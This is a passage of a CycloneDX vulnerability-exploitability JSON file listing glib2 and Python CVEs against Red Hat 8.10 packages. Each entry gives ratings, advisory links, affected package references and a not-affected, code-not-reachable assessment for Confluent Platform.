              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-1485",
      "ratings": [
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        124
      ],
      "description": "A flaw was found in Glib's content type parsing logic. This buffer underflow vulnerability occurs because the length of a header line is stored in a signed integer, which can lead to integer wraparound for very large inputs. This results in pointer underflow and out-of-bounds memory access. Exploitation requires a local user to install or process a specially crafted treemagic file, which can lead to local denial of service or application instability.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1485"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1485"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1485"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433325"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket-core-kit/blob/develop/advisories/14.5.0/BRSA-hui7k8rsmbsl.toml"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3871"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1485"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8017-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1485"
        }
      ],
      "published": "2026-01-27T14:15:56+00:00",
      "updated": "2026-06-17T10:15:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-1489",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "A flaw was found in GLib. An integer overflow vulnerability in its Unicode case conversion implementation can lead to memory corruption. By processing specially crafted and extremely large Unicode strings, an attacker could trigger an undersized memory allocation, resulting in out-of-bounds writes. This could cause applications utilizing GLib for string conversion to crash or become unstable.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1489"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1489"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1489"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433348"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket-core-kit/blob/develop/advisories/14.5.0/BRSA-h6zf92f0298p.toml"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3872"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1489"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8017-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1489"
        }
      ],
      "published": "2026-01-27T15:15:57+00:00",
      "updated": "2026-06-17T10:15:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-1502",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "CR/LF bytes were not rejected by HTTP client proxy tunnel headers or host.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1502"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/11/4"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19064"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1502"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19064.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19177"
        },
        {
          "url": "https://github.com/python/cpython/commit/05ed7ce7ae9e17c23a04085b2539fe6d6d3cef69"
        },
        {
          "url": "https://github.com/python/cpython/commit/56b7100b04e44ea27989242b176beb8f016b2c53"
        },
        {
          "url": "https://github.com/python/cpython/commit/58703ec1bdd1eb075e8b01a0c427683ce594dd3e"
        },
        {
          "url": "https://github.com/python/cpython/commit/9e071c9b28c17f347f81b388a003d4eeb3c7a8dd"
        },
        {
          "url": "https://github.com/python/cpython/commit/b1cf9016335cb637c5a425032e8274a224f4b2ed"
        },
        {
          "url": "https://github.com/python/cpython/commit/c00c386faa579ad71196d33408644478488e43ec"
        },
        {
          "url": "https://github.com/python/cpython/issues/146211"
        },
        {
          "url": "https://github.com/python/cpython/pull/146212"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-1502.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/2IVPAEQWUJBCTQZEJEVTYCIKSMQPGRZ3/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1502"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1502"
        }
      ],
      "published": "2026-04-10T18:16:40+00:00",
      "updated": "2026-08-13T01:16:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
